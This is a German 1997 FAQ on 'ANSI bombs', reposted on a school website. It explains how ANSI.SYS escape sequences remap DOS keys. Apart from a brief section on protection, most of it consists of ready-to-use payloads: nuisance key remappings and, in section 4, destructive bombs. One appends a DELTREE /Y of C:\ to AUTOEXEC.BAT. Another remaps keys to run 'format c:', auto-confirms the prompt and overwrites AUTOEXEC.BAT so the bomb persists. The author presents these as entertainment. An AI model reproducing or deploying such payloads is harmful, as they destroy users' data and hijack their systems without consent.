© 2003 unki.de/Schulcd : Informatik

ANSI Bomben FAQ 1.0

Copyright 1997 by Arthur Konze

Verwendete Symbole:

Inhaltsverzeichnis

Diese FAQ darf frei weitergegeben werden solange sie erstens nicht verändert wird und zweitens dafür keine Kosten erhoben werden. Sie untersteht jedoch weiterhin meinem Copyright. Änderungsvorschläge bitte direkt an den Autor unter 2:2452/172.18 oder 100607.1157@compuserve.com. Ich weise darauf hin, daß ich keinerlei Haftung für Schäden übernehme, die durch dieses Dokument entstehen.

INHALTSVERZEICHNIS
1.1 Was ist eine ANSI Bombe?
1.2 Welche Voraussetzungen brauchen ANSI Bomben?
1.3 Wie kann ich mich vor ANSI Bomben schützen?

2.1 Wie funktioniert eine ANSI Bombe?
2.2 Ist das nicht zu ersichtlich?
2.3 Muß ich alle ASCII Codes auswendig können?
2.4 Wie programmiere ich die Taste F1 um?

3.1 Wie wärs mit ein paar einfachen Beispielen?
3.2 Die "255Space" Bombe
3.3 Die "Return Back" Bombe
3.4 Die "Fuck You" Bombe

4.0 Hast du nichts was wirklich wehtut?
4.1 Die "Dir Killer" Bombe
4.2 Die "Format it" Bombe

1.1 Was ist eine ANSI Bombe?

Eine ANSI Bombe ist eine normale ASCII Textdatei, die mit ANSI Steuercodes versehen ist. Mit Hilfe dieser Steuercodes kann man Texte formatieren. Neben der Positionierung des Cursors und dem Hinzufügen von Farben lassem sich aber auch Tasten umprogrammieren. Diese Möglichkeit nutzen die sogenannten ANSI Bomben um gebräuchliche Tasten wie "a" oder "e" so umzuprogrammieren, daß sie stören oder Schaden anrichten.

1.2 Welche Voraussetzungen brauchen ANSI Bomben?

Voraussetzung für das Funktionieren einer ANSI Bombe ist ein geladener ANSI.SYS Treiber oder ein geladenes Äquivalent, das die Umprogrammierung von Tasten unterstützt. Ohne diesen Treiber findet keine Umprogrammierung statt und somit keine Aktivierung der Bombe. Weiterhin muß die Textdatei in der sich die Bombe befindet mit dem DOS Befehl "type" ausgegeben werden.

1.3 Wie kann ich mich vor ANSI Bomben schützen?

Die einfachste Möglichkeit ist keinen ANSI Treiber zu laden. Sollte dies nicht möglich sein, dann solltet ihr einen ANSI Treiber verwenden, der keine Umprogrammierung von Tasten zuläßt. Ist auch das nicht möglich, dann ist der Einsatz eines Textanzeigeprogramms wie "LIST" an Stelle von "type" die einzige Möglichkeit sich einigermaßen zu schützen.

2.1 Wie funktioniert eine ANSI Bombe?

Um zu verstehen wie ANSI Bomben aufgebaut werden schaut man sich am besten ein Beispiel an. Das nachfolgende einfache Beispiel soll zunächst nur einmal die Umprogrammierung der Tasten verdeutlichen. Beim Drücken der Taste "d" wird automatisch ein "dir" ausgeführt. Hierbei muß, wie auch in allen folgenden Beispielen, die Zeichenfolge "ESC" durch den ASCII Code 27 (Escape Taste) ersetzt werden. 

 ESC["d";"dir";13p
 |  | | |  |  | ||
 |  | | |  |  | |+- Befehl zum Umprogrammieren am Ende jeder Sequenz
 |  | | |  |  | +-- Code für die Return Taste zum automatischen
 |  | | |  |  |     Ausführen der Befehlssequenz "dir"
 |  | | +--|--+---- Das Semikolon dient als Trenner einzelner
 |  | | |           Abschnitte bzw. ASCII Codes
 |  | | +------- Die neue Tastenbelegung, der "dir" Befehl
 |  | +------------ Die Taste die umprogrammiert werden  soll,
 |  |               hier das "d"
 +--+-------------- Die Sequenz ESC und  [  leitet  jede  ANSI
                    Steuersequenz ein

2.2 Ist das nicht zu ersichtlich?

Doch, das ist es! Ich habe nur diese einfache Schreibweise gewählt, damit das Beispiel einfacher nachzuvollziehen ist. Normalerweise setzt man an Stelle der Zeichen deren ASCII Codes. Dann werden auch die einzelnen Abschnitte nicht mehr in Hochkommas geschrieben. Das Beispiel von 2.1 sähe dann wie folgt aus: ESC[68;68;73;82;13p

2.3 Muß ich alle ASCII Codes auswendig können?

Nein. Alle Codes in der DOS Hilfe zu ANSI.SYS. Dort könnt ihr alle ASCII Codes nachlesen. Desweiteren ist diese Hilfsdatei ein gutes Nachschlagewerk für Informationen im Bezug auf ANSI Programmierung. Also umbedingt mal reinschauen.

2.4 Wie programmiere ich die Taste F1 um?

Auch dies erfahrt ihr in der Hilfe zu ANSI.SYS. Also RTFM!!!

3.1 Wie wärs mit ein paar einfachen Beispielen?

Na gut. Hier also ein paar kleine Bomben, die nicht wehtun. Wichtig ist, daß ihr beim Ausprobieren immer vorher das ESC durch ein ASCII 27 ersetzt.

3.2 Die "255Space" Bombe

Diese Bombe vertauscht den ASCII Code 32 für die Leertaste mit dem ASCII Code 255, das nicht als Leerzeichen sondern als Buchstabe interpretiert wird.
ESC[32;255p

3.3 Die "Return Back" Bombe

Diese Bombe läst beim Drücken der Taste RETURN auch eine Backspace aus und gestaltet die Tastatureingabe sehr schwierig.
ESC[13;8;13p

3.4 Die "Fuck You" Bombe

Dies ist eine komplexe, codierte Bombe, die beim Drücken der Leertaste oder der Return Taste den Text "Fuck you^Fuck you" ausgibt.

 ESC[32;32;70;85;67;75;32;89;79;85;33;94;71;94;71;32;32;70;85
 ;67;75;32;89;79;85;33;7;7;32p
 ESC[13;32;70;85;67;75;32;89;79;85;33;94;71;94;71;32;32;70;85
 ;67;75;32;89;79;85;33;7;7;32p

4.0 Hast du nichts was wirklich wehtut?

Doch natürlich! Hier also zwei Beispiele, die wirklich Schaden anrichten können. Auch hier muß das ESC natürlich durch ein ASCII 27 ersetzt werden. Ich weise nochmals darauf hin, daß ich keinerlei Haftung für möglich Schäden übernehme!

4.1 Die "Dir Killer" Bombe

Beim Drücken der Taste "a" werden neue Befehlszeilen an die Datei AUTOEXEC.BAT angefügt, die beim nächsten Rechnerstart alle Verzeichnisse löschen.
ESC["a";13;"ECHO DELTREE /Y C:\*.* >>AUTOEXEC.BAT" ;13;"CLS"13;13p

4.2 Die "Format it" Bombe

Diese Bombe ist darauf ausgerichtet den Anwender dazu zu bringen seine Festplatte zu formatieren. Folgenden Tasten werden hier umprogrammiert:

   c,C,   -> Format c:+
   y,Y,n,N,+c,+  -> y+
   d,D,t,T  -> Ersetzen die AUTOEXEC.BAT
   durch eine Datei, die die
   Bombe aktiviert

Die Bombe besitzt eine enorme Sprengkraft! Es ist also äußerste Vorsicht geboten. Ok, genug geredet! Rein ins Vergnügen: 

 ESC[99;"format c:";13p
 ESC[67;"format c:";13p
 ESC[121;121;13p
 ESC[89;89;13p
 ESC[110;121;13p
 ESC[78;89;13p
 ESC[8;format c:";13p
 ESC[0;0;89;13p
 ESC[3;89;13p
 ESC[100;"copy key.ans c:\";13;"copy con
 c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
 ESC[68;"copy key.ans c:\";13;"copy con
 c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
 ESC[116;"copy key.ans c:\";13;"copy con
 c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
 ESC[84;"copy key.ans c:\";13;"copy con
 c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
War diese Seite für Sie hilfreich und möchten Sie vielleicht auch mir einmal einen Gefallen machen?? Dann wäre ich Ihnen dankbar, wenn Sie sich bei AMAZON über unteren Link ein Buch, eine CD oder ein sonstiges Produkt über diesen Link bestellen würden.

mit dankbaren Grüßen
Andreas (Unki)

Buchtitel:
In Partnerschaft mit Amazon.de

Biologie - Deutsch - Erdkunde - Informatik - Geschichte - Physik

© 2003 Andreas Unkelbach